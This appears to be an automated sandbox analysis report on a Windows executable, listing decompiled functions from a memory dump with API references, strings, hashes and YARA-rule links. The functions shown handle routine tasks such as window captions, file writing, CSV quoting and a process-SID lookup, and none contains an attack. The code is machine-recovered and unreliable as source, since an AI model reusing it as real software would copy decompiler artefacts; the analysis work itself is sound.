				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

0x00405e0a
0x00405e12
0x00405e18
0x00405e1c
0x00405e1e
0x00405e1e
0x00405e24
0x00405e2c
0x00405e2e
0x00405e44
0x00405e49
0x00405e4c
0x00405e4d
0x00405e68
0x00405e74
0x00405e74
0x00000000
0x00405e84
0x00405e8c

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

Y@, xrefs: 00409A46
WinStationGetProcessSid, xrefs: 00409A62
winsta.dll, xrefs: 00409A51

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x0040588e
0x0040588f
0x0040588f
0x00405892
0x00405896
0x004058a9
0x004058a9
0x004058ad
0x004058af
0x004058b5
0x004058b6
0x004058b9
0x004058c2
0x004058c3
0x004058c8
0x004058d2
0x004058d4
0x004058d9
0x004058e0
0x004058ea
0x004058ec
0x004058ed
0x004058f2
0x004058f9
0x00405902
0x00405898
0x00405898
0x0040589a
0x0040589c
0x004058a1
0x004058a2
0x004058a5
0x004058a7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004058a7
0x00405912
0x00405915
0x0040591e
0x0040591e
0x00405907
0x0040590b

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

0x0040ad06
0x0040ad0a
0x0040ad0c
0x0040ad14
0x0040ad19
0x0040ad1f
0x0040ad23
0x0040ad27
0x0040ad2a
0x0040ad2d
0x0040ad34
0x0040ad3b
0x0040ad3e
0x0040ad44
0x0040ad48
0x0040ad4a
0x0040ad52
0x0040ad5a
0x0040ad64
0x0040ad65
0x0040ad6b
0x0040ad6c
0x0040ad73
0x0040ad76
0x0040ad7c
0x0040ad7c
0x0040ad7f
0x0040ad84

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

0x00404a62
0x00404a6a
0x00404a6e
0x00404a71
0x00404a74
0x00404a92
0x00404a92
0x00404a76
0x00404a76
0x00404a87
0x00404a90
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a90
0x00404aa3
0x00404aa7
0x00404aa7
0x00404a94
0x00404a98

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

0x0040b6a6
0x0040b6ad
0x0040b6af
0x0040b6b0
0x0040b6b5
0x0040b6b6
0x0040b6bd
0x0040b6bf
0x0040b6c0
0x0040b6c5
0x0040b6c6
0x0040b6cd
0x0040b6cf
0x0040b6d0
0x0040b6d5
0x0040b6d6
0x0040b6dd
0x0040b6df
0x0040b6e0
0x00000000
0x0040b6e5
0x0040b6e6

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

0x00407362
0x00407369
0x0040736e
0x00407371
0x00407378
0x0040737e
0x00407381
0x00407386
0x0040739f
0x00407388
0x00407391
0x00407391
0x004073a4
0x004073ac
0x004073ad
0x004073cd
0x004073d0
0x004073d3
0x004073d6
0x004073e0
0x004073e7
0x004073ee
0x004073f5
0x0040741a
0x0040741a
0x0040741d
0x00407420
0x00407423
0x00407426
0x00000000
0x00000000
0x004073fc
0x00407400
0x0040740f
0x00407412
0x00407412
0x00407402
0x00407402
0x00407407
0x00407407
0x00407413
0x00407419
0x00407419
0x00407419
0x0040742f
0x00407434
0x00407437
0x00407439
0x0040743b
0x0040743b
0x0040744e
0x00407453
0x00407453
0x004073af
0x004073b2
0x004073ba
0x004073bb
0x00000000
0x004073bd
0x004073c3
0x004073c3
0x004073bb
0x0040745c
0x00407468
0x00407468
0x0040746d
0x00407473
0x0040747c
0x0040748e

APIs

